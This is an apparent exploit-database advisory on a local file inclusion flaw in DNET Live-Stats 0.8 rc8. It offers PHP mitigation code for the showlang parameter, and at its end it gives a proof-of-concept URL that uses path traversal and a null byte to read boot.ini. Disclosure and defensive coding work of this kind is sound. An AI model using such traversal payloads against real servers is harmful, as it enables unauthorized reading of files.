Vendor: DNET Live-Stats
By: Blake
CVSS: 7.5 (HIGH)
Type: Local File Inclusion
CWE: 22
Product Name: DNET Live-Stats
Affected Version From: 0.8 rc8
Affected Version To: 0.8 rc8
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2010

DNET Live-Stats 0.8 Local File Inclusion

The showlang parameter of DNET Live-Stats 0.8 does not properly sanitize user input, allowing an attacker to read arbitrary files on the server.

Mitigation:

Input validation should be used to prevent the inclusion of arbitrary files.
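
One way to apply this to a language selector such as showlang, shown as an added example that is not DNET Live-Stats code. The `lang/` directory, the `<code>.php` file naming, the default language and the function name `resolve_lang_file` are assumptions made for illustration.

```php
<?php
// Added example with a hypothetical layout; not taken from DNET Live-Stats.
// Assumption: language files are stored as ./lang/<code>.php.
const LANG_DIR = __DIR__ . '/lang';
const DEFAULT_LANG = 'en';

function resolve_lang_file(string $requested): string
{
    // Allowlist the shape of the value: "en", "de", "pt-br", ...
    // \A and \z anchor the whole string, so "../", path separators,
    // a trailing newline and NUL bytes (%00) are all rejected here.
    if (!preg_match('/\A[a-z]{2}(?:-[a-z]{2})?\z/', $requested)) {
        $requested = DEFAULT_LANG;
    }

    $base = realpath(LANG_DIR);
    $path = realpath(LANG_DIR . '/' . $requested . '.php');

    // Defence in depth: the canonical path must stay inside LANG_DIR
    // and must be a regular file; otherwise fall back to the default.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0
        || !is_file($path)) {
        $path = realpath(LANG_DIR . '/' . DEFAULT_LANG . '.php');
        if ($path === false) {
            throw new RuntimeException('default language file missing');
        }
    }
    return $path;
}

// The parameter can arrive as an array (showlang[]=x); accept strings only.
$showlang = $_GET['showlang'] ?? DEFAULT_LANG;
if (!is_string($showlang)) {
    $showlang = DEFAULT_LANG;
}
require resolve_lang_file($showlang);
```

The request value only ever selects among files that already exist in the language directory; it is never used as a path.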

Exploit-DB raw data:

# Exploit Title: DNET Live-Stats 0.8 Local File Inclusion
# Date: 10-04-10
# Author: Blake
# Software Link: http://sourceforge.net/projects/dnetlivestats/files/0.8/dnet-live-stats-0.8-rc8.zip/download
# Version: 0.8 rc8
# Tested on: Windows XP SP3 running xampp lite

The showlang parameter does not properly sanitize user input.

POC:
http://127.0.0.1/dnet/team.rc5-72.php?showlang=../../../../../../../../../../../../boot.ini%00